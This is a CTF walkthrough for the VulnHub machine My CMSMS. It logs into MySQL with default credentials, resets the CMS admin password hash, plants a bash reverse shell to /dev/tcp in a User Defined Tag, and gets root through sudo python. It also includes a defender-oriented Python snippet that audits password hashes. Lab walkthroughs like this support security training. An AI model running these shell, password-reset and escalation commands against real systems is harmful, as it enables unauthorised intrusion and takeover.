In this post we are solving another VulnHub machine, My CMSMS. This machine was made by Pankaj Verma, and the difficulty of the VM is easy to intermediate. Our goal is to get the root flag in the /root directory. You can download the VM here.
This VM has been designed by Pankaj Verma. The box contains some interesting things about CMS. It has been designed in a way to enhance the user's skills while playing with some privileges. It's a quite straightforward box, but stay aware of rabbit holes.
Let's start with netdiscover to discover our target IP address.
Now we have the target IP address, 192.168.1.3. Our next step is enumerating open ports and running services with nmap, using the -A parameter.
nmap -A 192.168.1.3
After scanning the target IP address we have 3 open ports on the target machine: 22 (SSH), 80 (HTTP, Apache httpd) and 3306 (MySQL).
We start enumeration by exploring the IP address in a browser, but we couldn't find anything useful, so we move to the next step: enumerating port 3306, the MySQL service. After trying some common passwords we log in as the MySQL root user with the password root.
mysql -h 192.168.1.3 -u root -p
show databases;
use cmsms_db;
We see four databases; I chose cmsms_db. Here we found the CMS Made Simple database and its tables. Let's dump the username, email address and password. In the cms_users table we found one user entry, and with a MySQL UPDATE query we can set a new password for the admin user. As the query shows, CMS Made Simple stores a password as the MD5 of the site-wide sitemask value (from cms_siteprefs, empty if the preference is missing) concatenated with the password, so the UPDATE computes that hash for hackNos.
select username,email,password from cms_users;
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'hackNos'))) where username = 'admin';
Our new password is updated. The next step is navigating to the login URL, where we can successfully log in with the admin username and the hackNos password.
- USERNAME: admin
- PASSWORD: hackNos
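As an added example (not part of the original walkthrough), here is a Python rendering of the hashing scheme the UPDATE statement above relies on, together with a small audit a defender can run over a dump of cms_users: because the sitemask is shared by the whole site rather than being a per-user salt, two accounts with the same password end up with identical stored hashes. The sitemask value and the sample rows are constructed.

```python
import hashlib
import hmac
from collections import defaultdict

def cmsms_password_hash(password: str, sitemask: str = "") -> str:
    """MD5 hex digest of sitemask + password, the value kept in cms_users.password.

    'sitemask' is the site-wide cms_siteprefs value the UPDATE query reads;
    it is the empty string when the preference is missing (the IFNULL above).
    """
    return hashlib.md5((sitemask + password).encode("utf-8")).hexdigest()

def verify_password(stored_hash: str, password: str, sitemask: str = "") -> bool:
    """Constant-time check of a candidate password against a stored hash."""
    return hmac.compare_digest(stored_hash.lower(),
                               cmsms_password_hash(password, sitemask))

def shared_password_groups(rows):
    """Return groups of usernames whose stored hashes are identical.

    rows: iterable of (username, password_hash) as dumped from cms_users.
    With only a site-wide mask as 'salt', identical hashes mean identical
    passwords, which a per-user salt would have hidden from an auditor.
    """
    by_hash = defaultdict(list)
    for username, password_hash in rows:
        by_hash[password_hash.lower()].append(username)
    return [users for users in by_hash.values() if len(users) > 1]

# Constructed sample data (not taken from the box): one sitemask, three accounts.
SAMPLE_SITEMASK = "constructed-sitemask"
SAMPLE_ROWS = [
    ("admin", cmsms_password_hash("hackNos", SAMPLE_SITEMASK)),
    ("editor", cmsms_password_hash("hackNos", SAMPLE_SITEMASK)),
    ("author", cmsms_password_hash("different", SAMPLE_SITEMASK)),
]

if __name__ == "__main__":
    print(verify_password(SAMPLE_ROWS[0][1], "hackNos", SAMPLE_SITEMASK))
    print(shared_password_groups(SAMPLE_ROWS))
```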
After logging in to the CMS panel we go to Extensions -> User Defined Tags, click the edit button on the user agent tag and replace the tag's code with a bash reverse shell. From here we can execute any Linux command.
system("bash -c 'bash -i >& /dev/tcp/192.168.1.2/4545 0>&1'");
Let's move to the next step: start our netcat listener and then run the curl command to trigger our payload.
nc -lvp 4545
curl -vv http://192.168.1.3/index.php?page=user-defined-tags
Now we have a reverse shell on the target machine. Let's enumerate the machine and look for weak files and services. We discover a hidden dot file in the apache2 home directory; opening it, we see base64 text.
ls | head -n 2
cd admin
ls -la | head -n 5
cat .htpasswd
Copy the text and decode it with the Linux built-in base64 tool using the -d parameter; the result is another encoded string, this time base32, which we decode with base32 -d.
Hmm, we have discovered the armour user's password. Let's try to log in as the armour user with the [email protected] password.
su armour
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
For privilege escalation we run the sudo -l command and see that we can run the python command with sudo without the root user's password.
sudo -l
sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
id
Now we have a root shell on the target machine. Let's run cd /root to go to the root directory and read proof.txt, our root flag. The challenge is completed.
cd /root
ls
cat proof.txt